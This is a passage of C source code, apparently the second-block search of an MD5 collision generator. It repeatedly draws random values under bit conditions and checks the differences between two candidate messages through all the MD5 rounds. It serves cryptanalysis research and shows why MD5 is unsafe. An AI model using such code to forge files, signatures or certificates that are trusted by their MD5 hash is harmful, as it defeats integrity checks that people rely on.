RR(s.Q1[ 1] - s.B1, 7) - F(s.B1, s.C1, s.D1) - s.A1 - 0xd76aa478; if(s.X0[16] != s.X1[16]) continue; break; } for(i = 0; i < 10; i++) { /* D1 */ s.Q0[ 2] = (random() | 0x8c000800) & ~(0x02208026 | 0x701f10c0); s.Q0[ 2] |= (s.Q0[ 1] & 0x701f10c0); s.Q1[ 2] = s.Q0[ 2] - 0x7dffffe0; s.X0[17] = RR(s.Q0[ 2] - s.Q0[ 1], 12) - F(s.Q0[ 1], s.B0, s.C0) - s.D0 - 0xe8c7b756; s.X1[17] = RR(s.Q1[ 2] - s.Q1[ 1], 12) - F(s.Q1[ 1], s.B1, s.C1) - s.D1 - 0xe8c7b756; if(s.X0[17] != s.X1[17]) continue; break; } if(i >= 10) goto block2_again; for(i = 0; i < 10; i++) { /* C1 */ s.Q0[ 3] = (random() | 0xbe1f0966) & ~(0x40201080 | 0x00000018); s.Q0[ 3] |= (s.Q0[ 2] & 0x00000018); s.Q1[ 3] = s.Q0[ 3] - 0x7dfef7e0; s.X0[18] = RR(s.Q0[ 3] - s.Q0[ 2], 17) - F(s.Q0[ 2], s.Q0[ 1], s.B0) - s.C0 - 0x242070db; s.X1[18] = RR(s.Q1[ 3] - s.Q1[ 2], 17) - F(s.Q1[ 2], s.Q1[ 1], s.B1) - s.C1 - 0x242070db; if(s.X0[18] != s.X1[18]) continue; break; } if(i >= 10) { if (ct3 == 0) { /* sometimes block1() returns a state that never gets past this point, causing block2() to hang forever. Try to detect this and fail (emergency exit). One example where this happens is the initial vector 0x874587a2 0xf09dfbdf 0x17732fb1 0x9299e527 with random seed 2. */ it++; if (it >= 10000) { return -1; } } goto block2_again; } for(i = 0; i < 10; i++) { /* B1 */ s.Q0[ 4] = (random() | 0xba040010) & ~(0x443b19ee | 0x00000601); s.Q0[ 4] |= (s.Q0[ 3] & 0x00000601); s.Q1[ 4] = s.Q0[ 4] - 0x7dffffe2; s.X0[19] = RR(s.Q0[ 4] - s.Q0[ 3], 22) - F(s.Q0[ 3], s.Q0[ 2], s.Q0[ 1]) - s.B0 - 0xc1bdceee; s.X1[19] = RR(s.Q1[ 4] - s.Q1[ 3], 22) - F(s.Q1[ 3], s.Q1[ 2], s.Q1[ 1]) - s.B1 - 0xc1bdceee; if(s.X0[19] != s.X1[19]) continue; break; } if(i >= 10) goto block2_again; for(i = 0; i < 10; i++) { /* A2 */ s.Q0[ 5] = (random() | 0x482f0e50) & ~0xb41011af; s.Q1[ 5] = s.Q0[ 5] - 0x7ffffcbf; s.X0[20] = RR(s.Q0[ 5] - s.Q0[ 4], 7) - F(s.Q0[ 4], s.Q0[ 3], s.Q0[ 2]) - s.Q0[ 1] - 0xf57c0faf; s.X1[20] = RR(s.Q1[ 5] - s.Q1[ 4], 7) - F(s.Q1[ 4], s.Q1[ 3], s.Q1[ 2]) - s.Q1[ 1] - 0xf57c0faf; if((s.X0[20] ^ s.X1[20]) != 0x80000000) continue; break; } if(i >= 10) goto block2_again; for(i = 0; i < 10; i++) { /* D2 */ s.Q0[ 6] = (random() | 0x04220c56) & ~0x9a1113a9; s.Q1[ 6] = s.Q0[ 6] - 0x80110000; s.X0[21] = RR(s.Q0[ 6] - s.Q0[ 5], 12) - F(s.Q0[ 5], s.Q0[ 4], s.Q0[ 3]) - s.Q0[ 2] - 0x4787c62a; s.X1[21] = RR(s.Q1[ 6] - s.Q1[ 5], 12) - F(s.Q1[ 5], s.Q1[ 4], s.Q1[ 3]) - s.Q1[ 2] - 0x4787c62a; if(s.X0[21] != s.X1[21]) continue; break; } if(i >= 10) goto block2_again; for(i = 0; i < 10; i++) { /* C2 */ s.Q0[ 7] = (random() | 0x96011e01) & ~(0x083201c0 | 0x01808000); s.Q0[ 7] |= (s.Q0[ 6] & 0x01808000); s.Q1[ 7] = s.Q0[ 7] - 0x88000040; s.X0[22] = RR(s.Q0[ 7] - s.Q0[ 6], 17) - F(s.Q0[ 6], s.Q0[ 5], s.Q0[ 4]) - s.Q0[ 3] - 0xa8304613; s.X1[22] = RR(s.Q1[ 7] - s.Q1[ 6], 17) - F(s.Q1[ 6], s.Q1[ 5], s.Q1[ 4]) - s.Q1[ 3] - 0xa8304613; if(s.X0[22] != s.X1[22]) continue; break; } if(i >= 10) goto block2_again; for(i = 0; i < 10; i++) { /* B2 */ s.Q0[ 8] = (random() | 0x843283c0) & ~(0x1b810001 | 0x00000002); s.Q0[ 8] |= (s.Q0[ 7] & 0x00000002); s.Q1[ 8] = s.Q0[ 8] - 0x80818000; s.X0[23] = RR(s.Q0[ 8] - s.Q0[ 7], 22) - F(s.Q0[ 7], s.Q0[ 6], s.Q0[ 5]) - s.Q0[ 4] - 0xfd469501; s.X1[23] = RR(s.Q1[ 8] - s.Q1[ 7], 22) - F(s.Q1[ 7], s.Q1[ 6], s.Q1[ 5]) - s.Q1[ 4] - 0xfd469501; if(s.X0[23] != s.X1[23]) continue; break; } if(i >= 10) goto block2_again; for(i = 0; i < 10; i++) { /* A3 */ s.Q0[ 9] = (random() | 0x9c0101c1) & ~(0x03828202 | 0x00001000); s.Q0[ 9] |= (s.Q0[ 8] & 0x00001000); s.Q1[ 9] = s.Q0[ 9] - 0x7fffffbf; s.X0[24] = RR(s.Q0[ 9] - s.Q0[ 8], 7) - F(s.Q0[ 8], s.Q0[ 7], s.Q0[ 6]) - s.Q0[ 5] - 0x698098d8; s.X1[24] = RR(s.Q1[ 9] - s.Q1[ 8], 7) - F(s.Q1[ 8], s.Q1[ 7], s.Q1[ 6]) - s.Q1[ 5] - 0x698098d8; if(s.X0[24] != s.X1[24]) continue; break; } if(i >= 10) goto block2_again; for(i = 0; i < 10; i++) { /* D3 */ s.Q0[10] = (random() | 0x878383c0) & ~0x00041003; s.Q1[10] = s.Q0[10] - 0x7ffff000; s.X0[25] = RR(s.Q0[10] - s.Q0[ 9], 12) - F(s.Q0[ 9], s.Q0[ 8], s.Q0[ 7]) - s.Q0[ 6] - 0x8b44f7af; s.X1[25] = RR(s.Q1[10] - s.Q1[ 9], 12) - F(s.Q1[ 9], s.Q1[ 8], s.Q1[ 7]) - s.Q1[ 6] - 0x8b44f7af; if(s.X0[25] != s.X1[25]) continue; break; } if(i >= 10) goto block2_again; for(i = 0; i < 10; i++) { /* C3 */ s.Q0[11] = (random() | 0x800583c3) & ~(0x00021000 | 0x00086000); s.Q0[11] |= (s.Q0[10] & 0x00086000); s.Q1[11] = s.Q0[11] - 0x80000000; s.X0[26] = RR(s.Q0[11] - s.Q0[10], 17) - F(s.Q0[10], s.Q0[ 9], s.Q0[ 8]) - s.Q0[ 7] - 0xffff5bb1; s.X1[26] = RR(s.Q1[11] - s.Q1[10], 17) - F(s.Q1[10], s.Q1[ 9], s.Q1[ 8]) - s.Q1[ 7] - 0xffff5bb1; if(s.X0[26] != s.X1[26]) continue; break; } if(i >= 10) goto block2_again; for(i = 0; i < 10; i++) { /* B3 */ s.Q0[12] = (random() | 0x80081080) & ~(0x0007e000 | 0x7f000000); s.Q0[12] |= (s.Q0[11] & 0x7f000000); s.Q1[12] = s.Q0[12] - 0x80002080; s.X0[27] = RR(s.Q0[12] - s.Q0[11], 22) - F(s.Q0[11], s.Q0[10], s.Q0[ 9]) - s.Q0[ 8] - 0x895cd7be; s.X1[27] = RR(s.Q1[12] - s.Q1[11], 22) - F(s.Q1[11], s.Q1[10], s.Q1[ 9]) - s.Q1[ 8] - 0x895cd7be; if((s.X0[27] ^ s.X1[27]) != 0x00008000) continue; break; } if(i >= 10) goto block2_again; for(i = 0; i < 10; i++) { /* A4 */ s.Q0[13] = (random() | 0x3f0fe008) & ~0x80000080; s.Q1[13] = s.Q0[13] - 0x7f000000; s.X0[28] = RR(s.Q0[13] - s.Q0[12], 7) - F(s.Q0[12], s.Q0[11], s.Q0[10]) - s.Q0[ 9] - 0x6b901122; s.X1[28] = RR(s.Q1[13] - s.Q1[12], 7) - F(s.Q1[12], s.Q1[11], s.Q1[10]) - s.Q1[ 9] - 0x6b901122; if(s.X0[28] != s.X1[28]) continue; break; } if(i >= 10) goto block2_again; for(i = 0; i < 10; i++) { /* D4 */ s.Q0[14] = (random() | 0x400be088) & ~0xbf040000; s.Q1[14] = s.Q0[14] - 0x80000000; s.X0[29] = RR(s.Q0[14] - s.Q0[13], 12) - F(s.Q0[13], s.Q0[12], s.Q0[11]) - s.Q0[10] - 0xfd987193; s.X1[29] = RR(s.Q1[14] - s.Q1[13], 12) - F(s.Q1[13], s.Q1[12], s.Q1[11]) - s.Q1[10] - 0xfd987193; if(s.X0[29] != s.X1[29]) continue; break; } if(i >= 10) goto block2_again; for(i = 0; i < 10; i++) { /* C4 */ s.Q0[15] = (random() | 0x7d000000) & ~0x82008008; s.Q1[15] = s.Q0[15] - 0x7fff7ff8; s.X0[30] = RR(s.Q0[15] - s.Q0[14], 17) - F(s.Q0[14], s.Q0[13], s.Q0[12]) - s.Q0[11] - 0xa679438e; s.X1[30] = RR(s.Q1[15] - s.Q1[14], 17) - F(s.Q1[14], s.Q1[13], s.Q1[12]) - s.Q1[11] - 0xa679438e; if((s.X0[30] ^ s.X1[30]) != 0x80000000) continue; break; } if(i >= 10) goto block2_again; for(i = 0; i < LOOP_21; i++) { /* B4 */ s.Q0[16] = (random() | 0x20000000) & ~0x80000000; s.Q1[16] = s.Q0[16] - 0xa0000000; s.X0[31] = RR(s.Q0[16] - s.Q0[15], 22) - F(s.Q0[15], s.Q0[14], s.Q0[13]) - s.Q0[12] - 0x49b40821; s.X1[31] = RR(s.Q1[16] - s.Q1[15], 22) - F(s.Q1[15], s.Q1[14], s.Q1[13]) - s.Q1[12] - 0x49b40821; if(s.X0[31] != s.X1[31]) continue; /* A5 */ s.Q0[17] = RL(G(s.Q0[16], s.Q0[15], s.Q0[14]) + s.Q0[13] + s.X0[17] + 0xf61e2562, 5) + s.Q0[16]; if((s.Q0[17] & 0x80028008) != (s.Q0[16] & 0x00008008)) continue; s.Q1[17] = RL(G(s.Q1[16], s.Q1[15], s.Q1[14]) + s.Q1[13] + s.X1[17] + 0xf61e2562, 5) + s.Q1[16]; if((s.Q0[17] ^ s.Q1[17]) != 0x80000000) continue; /* D5 */ s.Q0[18] = RL(G(s.Q0[17], s.Q0[16], s.Q0[15]) + s.Q0[14] + s.X0[22] + 0xc040b340, 9) + s.Q0[17]; if((s.Q0[18] & 0xa0020000) != ((s.Q0[17] & 0x20000000) | 0x00020000)) { continue; } s.Q1[18] = RL(G(s.Q1[17], s.Q1[16], s.Q1[15]) + s.Q1[14] + s.X1[22] + 0xc040b340, 9) + s.Q1[17]; if((s.Q0[18] ^ s.Q1[18]) != 0x80000000) continue; /* C5 */ s.Q0[19] = RL(G(s.Q0[18], s.Q0[17], s.Q0[16]) + s.Q0[15] + s.X0[27] + 0x265e5a51, 14) + s.Q0[18]; if(s.Q0[19] & 0x80020000) continue; s.Q1[19] = RL(G(s.Q1[18], s.Q1[17], s.Q1[16]) + s.Q1[15] + s.X1[27] + 0x265e5a51, 14) + s.Q1[18]; if((s.Q0[19] - s.Q1[19]) != 0x7ffe0000) continue; /* B5 */ s.Q0[20] = RL(G(s.Q0[19], s.Q0[18], s.Q0[17]) + s.Q0[16] + s.X0[16] + 0xe9b6c7aa, 20) + s.Q0[19]; if(s.Q0[20] & 0x80000000) continue; s.Q1[20] = RL(G(s.Q1[19], s.Q1[18], s.Q1[17]) + s.Q1[16] + s.X1[16] + 0xe9b6c7aa, 20) + s.Q1[19]; if((s.Q0[20] ^ s.Q1[20]) != 0x80000000) continue; /* A6 */ s.Q0[21] = RL(G(s.Q0[20], s.Q0[19], s.Q0[18]) + s.Q0[17] + s.X0[21] + 0xd62f105d, 5) + s.Q0[20]; if((s.Q0[21] & 0x80020000) != (s.Q0[20] & 0x00020000)) continue; s.Q1[21] = RL(G(s.Q1[20], s.Q1[19], s.Q1[18]) + s.Q1[17] + s.X1[21] + 0xd62f105d, 5) + s.Q1[20]; if((s.Q0[21] ^ s.Q1[21]) != 0x80000000) continue; break; } if(i >= LOOP_21) goto block2_again; ct3++; for(i = 0; i < LOOP_22; i++) { if (cb) { if ((i & 0xfffff) == 0) { if (callback4(cb, s.ct1, s.ct2, ct3, i>>20)) { return 1; } } } /* B4 */ s.Q0[16] ^= mask22[random() % 30]; s.Q1[16] = s.Q0[16] - 0xa0000000; s.X0[31] = RR(s.Q0[16] - s.Q0[15], 22) - F(s.Q0[15], s.Q0[14], s.Q0[13]) - s.Q0[12] - 0x49b40821; s.X1[31] = RR(s.Q1[16] - s.Q1[15], 22) - F(s.Q1[15], s.Q1[14], s.Q1[13]) - s.Q1[12] - 0x49b40821; if(s.X0[31] != s.X1[31]) continue; /* A5 */ s.Q0[17] = RL(G(s.Q0[16], s.Q0[15], s.Q0[14]) + s.Q0[13] + s.X0[17] + 0xf61e2562, 5) + s.Q0[16]; if((s.Q0[17] & 0x80028008) != (s.Q0[16] & 0x00008008)) continue; s.Q1[17] = RL(G(s.Q1[16], s.Q1[15], s.Q1[14]) + s.Q1[13] + s.X1[17] + 0xf61e2562, 5) + s.Q1[16]; if((s.Q0[17] ^ s.Q1[17]) != 0x80000000) continue; /* D5 */ s.Q0[18] = RL(G(s.Q0[17], s.Q0[16], s.Q0[15]) + s.Q0[14] + s.X0[22] + 0xc040b340, 9) + s.Q0[17]; if((s.Q0[18] & 0xa0020000) != ((s.Q0[17] & 0x20000000) | 0x00020000)) { continue; } s.Q1[18] = RL(G(s.Q1[17], s.Q1[16], s.Q1[15]) + s.Q1[14] + s.X1[22] + 0xc040b340, 9) + s.Q1[17]; if((s.Q0[18] ^ s.Q1[18]) != 0x80000000) continue; /* C5 */ s.Q0[19] = RL(G(s.Q0[18], s.Q0[17], s.Q0[16]) + s.Q0[15] + s.X0[27] + 0x265e5a51, 14) + s.Q0[18]; if(s.Q0[19] & 0x80020000) continue; s.Q1[19] = RL(G(s.Q1[18], s.Q1[17], s.Q1[16]) + s.Q1[15] + s.X1[27] + 0x265e5a51, 14) + s.Q1[18]; if((s.Q0[19] - s.Q1[19]) != 0x7ffe0000) continue; /* B5 */ s.Q0[20] = RL(G(s.Q0[19], s.Q0[18], s.Q0[17]) + s.Q0[16] + s.X0[16] + 0xe9b6c7aa, 20) + s.Q0[19]; if(s.Q0[20] & 0x80000000) continue; s.Q1[20] = RL(G(s.Q1[19], s.Q1[18], s.Q1[17]) + s.Q1[16] + s.X1[16] + 0xe9b6c7aa, 20) + s.Q1[19]; if((s.Q0[20] ^ s.Q1[20]) != 0x80000000) continue; /* A6 */ s.Q0[21] = RL(G(s.Q0[20], s.Q0[19], s.Q0[18]) + s.Q0[17] + s.X0[21] + 0xd62f105d, 5) + s.Q0[20]; if((s.Q0[21] & 0x80020000) != (s.Q0[20] & 0x00020000)) continue; s.Q1[21] = RL(G(s.Q1[20], s.Q1[19], s.Q1[18]) + s.Q1[17] + s.X1[21] + 0xd62f105d, 5) + s.Q1[20]; if((s.Q0[21] ^ s.Q1[21]) != 0x80000000) continue; /* D6 */ s.Q0[22] = RL(G(s.Q0[21], s.Q0[20], s.Q0[19]) + s.Q0[18] + s.X0[26] + 0x02441453, 9) + s.Q0[21]; if(s.Q0[22] & 0x80000000) continue; s.Q1[22] = RL(G(s.Q1[21], s.Q1[20], s.Q1[19]) + s.Q1[18] + s.X1[26] + 0x02441453, 9) + s.Q1[21]; if((s.Q0[22] ^ s.Q1[22]) != 0x80000000) continue; /* C6 */ s.Q0[23] = RL(G(s.Q0[22], s.Q0[21], s.Q0[20]) + s.Q0[19] + s.X0[31] + 0xd8a1e681, 14) + s.Q0[22]; if(s.Q0[23] & 0x80000000) continue; s.Q1[23] = RL(G(s.Q1[22], s.Q1[21], s.Q1[20]) + s.Q1[19] + s.X1[31] + 0xd8a1e681, 14) + s.Q1[22]; if(s.Q0[23] != s.Q1[23]) continue; /* B6 */ s.Q0[24] = RL(G(s.Q0[23], s.Q0[22], s.Q0[21]) + s.Q0[20] + s.X0[20] + 0xe7d3fbc8, 20) + s.Q0[23]; s.Q1[24] = RL(G(s.Q1[23], s.Q1[22], s.Q1[21]) + s.Q1[20] + s.X1[20] + 0xe7d3fbc8, 20) + s.Q1[23]; if(s.Q0[24] != s.Q1[24]) continue; /* A7 */ s.Q0[25] = RL(G(s.Q0[24], s.Q0[23], s.Q0[22]) + s.Q0[21] + s.X0[25] + 0x21e1cde6, 5) + s.Q0[24]; s.Q1[25] = RL(G(s.Q1[24], s.Q1[23], s.Q1[22]) + s.Q1[21] + s.X1[25] + 0x21e1cde6, 5) + s.Q1[24]; if(s.Q0[25] != s.Q1[25]) continue; /* D7 */ s.Q0[26] = RL(G(s.Q0[25], s.Q0[24], s.Q0[23]) + s.Q0[22] + s.X0[30] + 0xc33707d6, 9) + s.Q0[25]; s.Q1[26] = RL(G(s.Q1[25], s.Q1[24], s.Q1[23]) + s.Q1[22] + s.X1[30] + 0xc33707d6, 9) + s.Q1[25]; if(s.Q0[26] != s.Q1[26]) continue; /* C7 */ s.Q0[27] = RL(G(s.Q0[26], s.Q0[25], s.Q0[24]) + s.Q0[23] + s.X0[19] + 0xf4d50d87, 14) + s.Q0[26]; s.Q1[27] = RL(G(s.Q1[26], s.Q1[25], s.Q1[24]) + s.Q1[23] + s.X1[19] + 0xf4d50d87, 14) + s.Q1[26]; if(s.Q0[27] != s.Q1[27]) continue; /* B7 */ s.Q0[28] = RL(G(s.Q0[27], s.Q0[26], s.Q0[25]) + s.Q0[24] + s.X0[24] + 0x455a14ed, 20) + s.Q0[27]; s.Q1[28] = RL(G(s.Q1[27], s.Q1[26], s.Q1[25]) + s.Q1[24] + s.X1[24] + 0x455a14ed, 20) + s.Q1[27]; if(s.Q0[28] != s.Q1[28]) continue; /* A8 */ s.Q0[29] = RL(G(s.Q0[28], s.Q0[27], s.Q0[26]) + s.Q0[25] + s.X0[29] + 0xa9e3e905, 5) + s.Q0[28]; s.Q1[29] = RL(G(s.Q1[28], s.Q1[27], s.Q1[26]) + s.Q1[25] + s.X1[29] + 0xa9e3e905, 5) + s.Q1[28]; if(s.Q0[29] != s.Q1[29]) continue; /* D8 */ s.Q0[30] = RL(G(s.Q0[29], s.Q0[28], s.Q0[27]) + s.Q0[26] + s.X0[18] + 0xfcefa3f8, 9) + s.Q0[29]; s.Q1[30] = RL(G(s.Q1[29], s.Q1[28], s.Q1[27]) + s.Q1[26] + s.X1[18] + 0xfcefa3f8, 9) + s.Q1[29]; if(s.Q0[30] != s.Q1[30]) continue; /* C8 */ s.Q0[31] = RL(G(s.Q0[30], s.Q0[29], s.Q0[28]) + s.Q0[27] + s.X0[23] + 0x676f02d9, 14) + s.Q0[30]; s.Q1[31] = RL(G(s.Q1[30], s.Q1[29], s.Q1[28]) + s.Q1[27] + s.X1[23] + 0x676f02d9, 14) + s.Q1[30]; if(s.Q0[31] != s.Q1[31]) continue; /* B8 */ s.Q0[32] = RL(G(s.Q0[31], s.Q0[30], s.Q0[29]) + s.Q0[28] + s.X0[28] + 0x8d2a4c8a, 20) + s.Q0[31]; s.Q1[32] = RL(G(s.Q1[31], s.Q1[30], s.Q1[29]) + s.Q1[28] + s.X1[28] + 0x8d2a4c8a, 20) + s.Q1[31]; if(s.Q0[32] != s.Q1[32]) continue; /* A9 */ s.Q0[33] = RL(H(s.Q0[32], s.Q0[31], s.Q0[30]) + s.Q0[29] + s.X0[21] + 0xfffa3942, 4) + s.Q0[32]; s.Q1[33] = RL(H(s.Q1[32], s.Q1[31], s.Q1[30]) + s.Q1[29] + s.X1[21] + 0xfffa3942, 4) + s.Q1[32]; if(s.Q0[33] != s.Q1[33]) continue; /* D9 */ s.Q0[34] = RL(H(s.Q0[33], s.Q0[32], s.Q0[31]) + s.Q0[30] + s.X0[24] + 0x8771f681, 11) + s.Q0[33]; s.Q1[34] = RL(H(s.Q1[33], s.Q1[32], s.Q1[31]) + s.Q1[30] + s.X1[24] + 0x8771f681, 11) + s.Q1[33]; if(s.Q0[34] != s.Q1[34]) continue; /* C9 */ s.Q0[35] = RL(H(s.Q0[34], s.Q0[33], s.Q0[32]) + s.Q0[31] + s.X0[27] + 0x6d9d6122, 16) + s.Q0[34]; s.Q1[35] = RL(H(s.Q1[34], s.Q1[33], s.Q1[32]) + s.Q1[31] + s.X1[27] + 0x6d9d6122, 16) + s.Q1[34]; if((s.Q0[35] ^ s.Q1[35]) != 0x80000000) continue; /* B9 */ s.Q0[36] = RL(H(s.Q0[35], s.Q0[34], s.Q0[33]) + s.Q0[32] + s.X0[30] + 0xfde5380c, 23) + s.Q0[35]; s.Q1[36] = RL(H(s.Q1[35], s.Q1[34], s.Q1[33]) + s.Q1[32] + s.X1[30] + 0xfde5380c, 23) + s.Q1[35]; if((s.Q0[36] ^ s.Q1[36]) != 0x80000000) continue; /* A10 */ s.Q0[37] = RL(H(s.Q0[36], s.Q0[35], s.Q0[34]) + s.Q0[33] + s.X0[17] + 0xa4beea44, 4) + s.Q0[36]; s.Q1[37] = RL(H(s.Q1[36], s.Q1[35], s.Q1[34]) + s.Q1[33] + s.X1[17] + 0xa4beea44, 4) + s.Q1[36]; if((s.Q0[37] ^ s.Q1[37]) != 0x80000000) continue; /* D10 */ s.Q0[38] = RL(H(s.Q0[37], s.Q0[36], s.Q0[35]) + s.Q0[34] + s.X0[20] + 0x4bdecfa9, 11) + s.Q0[37]; s.Q1[38] = RL(H(s.Q1[37], s.Q1[36], s.Q1[35]) + s.Q1[34] + s.X1[20] + 0x4bdecfa9, 11) + s.Q1[37]; if((s.Q0[38] ^ s.Q1[38]) != 0x80000000) continue; /* C10 */ s.Q0[39] = RL(H(s.Q0[38], s.Q0[37], s.Q0[36]) + s.Q0[35] + s.X0[23] + 0xf6bb4b60, 16) + s.Q0[38]; s.Q1[39] = RL(H(s.Q1[38], s.Q1[37], s.Q1[36]) + s.Q1[35] + s.X1[23] + 0xf6bb4b60, 16) + s.Q1[38]; if((s.Q0[39] ^ s.Q1[39]) != 0x80000000) continue; /* B10 */ s.Q0[40] = RL(H(s.Q0[39], s.Q0[38], s.Q0[37]) + s.Q0[36] + s.X0[26] + 0xbebfbc70, 23) + s.Q0[39]; s.Q1[40] = RL(H(s.Q1[39], s.Q1[38], s.Q1[37]) + s.Q1[36] + s.X1[26] + 0xbebfbc70, 23) + s.Q1[39]; if((s.Q0[40] ^ s.Q1[40]) != 0x80000000) continue; /* A11 */ s.Q0[41] = RL(H(s.Q0[40], s.Q0[39], s.Q0[38]) + s.Q0[37] + s.X0[29] + 0x289b7ec6, 4) + s.Q0[40]; s.Q1[41] = RL(H(s.Q1[40], s.Q1[39], s.Q1[38]) + s.Q1[37] + s.X1[29] + 0x289b7ec6, 4) + s.Q1[40]; if((s.Q0[41] ^ s.Q1[41]) != 0x80000000) continue; /* D11 */ s.Q0[42] = RL(H(s.Q0[41], s.Q0[40], s.Q0[39]) + s.Q0[38] + s.X0[16] + 0xeaa127fa, 11) + s.Q0[41]; s.Q1[42] = RL(H(s.Q1[41], s.Q1[40], s.Q1[39]) + s.Q1[38] + s.X1[16] + 0xeaa127fa, 11) + s.Q1[41]; if((s.Q0[42] ^ s.Q1[42]) != 0x80000000) continue; /* C11 */ s.Q0[43] = RL(H(s.Q0[42], s.Q0[41], s.Q0[40]) + s.Q0[39] + s.X0[19] + 0xd4ef3085, 16) + s.Q0[42]; s.Q1[43] = RL(H(s.Q1[42], s.Q1[41], s.Q1[40]) + s.Q1[39] + s.X1[19] + 0xd4ef3085, 16) + s.Q1[42]; if((s.Q0[43] ^ s.Q1[43]) != 0x80000000) continue; /* B11 */ s.Q0[44] = RL(H(s.Q0[43], s.Q0[42], s.Q0[41]) + s.Q0[40] + s.X0[22] + 0x04881d05, 23) + s.Q0[43]; s.Q1[44] = RL(H(s.Q1[43], s.Q1[42], s.Q1[41]) + s.Q1[40] + s.X1[22] + 0x04881d05, 23) + s.Q1[43]; if((s.Q0[44] ^ s.Q1[44]) != 0x80000000) continue; /* A12 */ s.Q0[45] = RL(H(s.Q0[44], s.Q0[43], s.Q0[42]) + s.Q0[41] + s.X0[25] + 0xd9d4d039, 4) + s.Q0[44]; s.Q1[45] = RL(H(s.Q1[44], s.Q1[43], s.Q1[42]) + s.Q1[41] + s.X1[25] + 0xd9d4d039, 4) + s.Q1[44]; if((s.Q0[45] ^ s.Q1[45]) != 0x80000000) continue; /* D12 */ s.Q0[46] = RL(H(s.Q0[45], s.Q0[44], s.Q0[43]) + s.Q0[42] + s.X0[28] + 0xe6db99e5, 11) + s.Q0[45]; s.Q1[46] = RL(H(s.Q1[45], s.Q1[44], s.Q1[43]) + s.Q1[42] + s.X1[28] + 0xe6db99e5, 11) + s.Q1[45]; if((s.Q0[46] ^ s.Q1[46]) != 0x80000000) continue; /* C12 */ s.Q0[47] = RL(H(s.Q0[46], s.Q0[45], s.Q0[44]) + s.Q0[43] + s.X0[31] + 0x1fa27cf8, 16) + s.Q0[46]; s.Q1[47] = RL(H(s.Q1[46], s.Q1[45], s.Q1[44]) + s.Q1[43] + s.X1[31] + 0x1fa27cf8, 16) + s.Q1[46]; if((s.Q0[47] ^ s.Q1[47]) != 0x80000000) continue; /* B12 */ s.Q0[48] = RL(H(s.Q0[47], s.Q0[46], s.Q0[45]) + s.Q0[44] + s.X0[18] + 0xc4ac5665, 23) + s.Q0[47]; if((s.Q0[48] & 0x80000000) != (s.Q0[46] & 0x80000000)) continue; s.Q1[48] = RL(H(s.Q1[47], s.Q1[46], s.Q1[45]) + s.Q1[44] + s.X1[18] + 0xc4ac5665, 23) + s.Q1[47]; if((s.Q0[48] ^ s.Q1[48]) != 0x80000000) continue; /* A13 */ s.Q0[49] = RL(I(s.Q0[48], s.Q0[47], s.Q0[46]) + s.Q0[45] + s.X0[16] + 0xf4292244, 6) + s.Q0[48]; if((s.Q0[49] & 0x80000000) != (s.Q0[47] & 0x80000000)) continue; s.Q1[49] = RL(I(s.Q1[48], s.Q1[47], s.Q1[46]) + s.Q1[45] + s.X1[16] + 0xf4292244, 6) + s.Q1[48]; if((s.Q0[49] ^ s.Q1[49]) != 0x80000000) continue; /* D13 */ s.Q0[50] = RL(I(s.Q0[49], s.Q0[48], s.Q0[47]) + s.Q0[46] + s.X0[23] + 0x432aff97, 10) + s.Q0[49]; s.Q1[50] = RL(I(s.Q1[49], s.Q1[48], s.Q1[47]) + s.Q1[46] + s.X1[23] + 0x432aff97, 10) + s.Q1[49]; if((s.Q0[50] ^ s.Q1[50]) != 0x80000000) continue; /* C13 */ s.Q0[51] = RL(I(s.Q0[50], s.Q0[49], s.Q0[48]) + s.Q0[47] + s.X0[30] + 0xab9423a7, 15) + s.Q0[50]; if((s.Q0[51] & 0x80000000) != (s.Q0[49] & 0x80000000)) continue; s.Q1[51] = RL(I(s.Q1[50], s.Q1[49], s.Q1[48]) + s.Q1[47] + s.X1[30] + 0xab9423a7, 15) + s.Q1[50]; if((s.Q0[51] ^ s.Q1[51]) != 0x80000000) continue; /* B13 */ s.Q0[52] = RL(I(s.Q0[51], s.Q0[50], s.Q0[49]) + s.Q0[48] + s.X0[21] + 0xfc93a039, 21) + s.Q0[51]; if((s.Q0[52] & 0x80000000) != (s.Q0[50] & 0x80000000)) continue; s.Q1[52] = RL(I(s.Q1[51], s.Q1[50], s.Q1[49]) + s.Q1[48] + s.X1[21] + 0xfc93a039, 21) + s.Q1[51]; if((s.Q0[52] ^ s.Q1[52]) != 0x80000000) continue; /* A14 */ s.Q0[53] = RL(I(s.Q0[52], s.Q0[51], s.Q0[50]) + s.Q0[49] + s.X0[28] + 0x655b59c3, 6) + s.Q0[52]; if((s.Q0[53] & 0x80000000) != (s.Q0[51] & 0x80000000)) continue; s.Q1[53] = RL(I(s.Q1[52], s.Q1[51], s.Q1[50]) + s.Q1[49] + s.X1[28] + 0x655b59c3, 6) + s.Q1[52]; if((s.Q0[53] ^ s.Q1[53]) != 0x80000000) continue; /* D14 */ s.Q0[54] = RL(I(s.Q0[53], s.Q0[52], s.Q0[51]) + s.Q0[50] + s.X0[19] + 0x8f0ccc92, 10) + s.Q0[53]; if((s.Q0[54] & 0x80000000) != (s.Q0[52] & 0x80000000)) continue; s.Q1[54] = RL(I(s.Q1[53], s.Q1[52], s.Q1[51]) + s.Q1[50] + s.X1[19] + 0x8f0ccc92, 10) + s.Q1[53]; if((s.Q0[54] ^ s.Q1[54]) != 0x80000000) continue; /* C14 */ s.Q0[55] = RL(I(s.Q0[54], s.Q0[53], s.Q0[52]) + s.Q0[51] + s.X0[26] + 0xffeff47d, 15) + s.Q0[54]; if((s.Q0[55] & 0x80000000) != (s.Q0[53] & 0x80000000)) continue; s.Q1[55] = RL(I(s.Q1[54], s.Q1[53], s.Q1[52]) + s.Q1[51] + s.X1[26] + 0xffeff47d, 15) + s.Q1[54]; if((s.Q0[55] ^ s.Q1[55]) != 0x80000000) continue; /* B14 */ s.Q0[56] = RL(I(s.Q0[55], s.Q0[54], s.Q0[53]) + s.Q0[52] + s.X0[17] + 0x85845dd1, 21) + s.Q0[55]; if((s.Q0[56] & 0x80000000) != (s.Q0[54] & 0x80000000)) continue; s.Q1[56] = RL(I(s.Q1[55], s.Q1[54], s.Q1[53]) + s.Q1[52] + s.X1[17] + 0x85845dd1, 21) + s.Q1[55]; if((s.Q0[56] ^ s.Q1[56]) != 0x80000000) continue; /* A15 */ s.Q0[57] = RL(I(s.Q0[56], s.Q0[55], s.Q0[54]) + s.Q0[53] + s.X0[24] + 0x6fa87e4f, 6) + s.Q0[56]; if((s.Q0[57] & 0x80000000) != (s.Q0[55] & 0x80000000)) continue; s.Q1[57] = RL(I(s.Q1[56], s.Q1[55], s.Q1[54]) + s.Q1[53] + s.X1[24] + 0x6fa87e4f, 6) + s.Q1[56]; 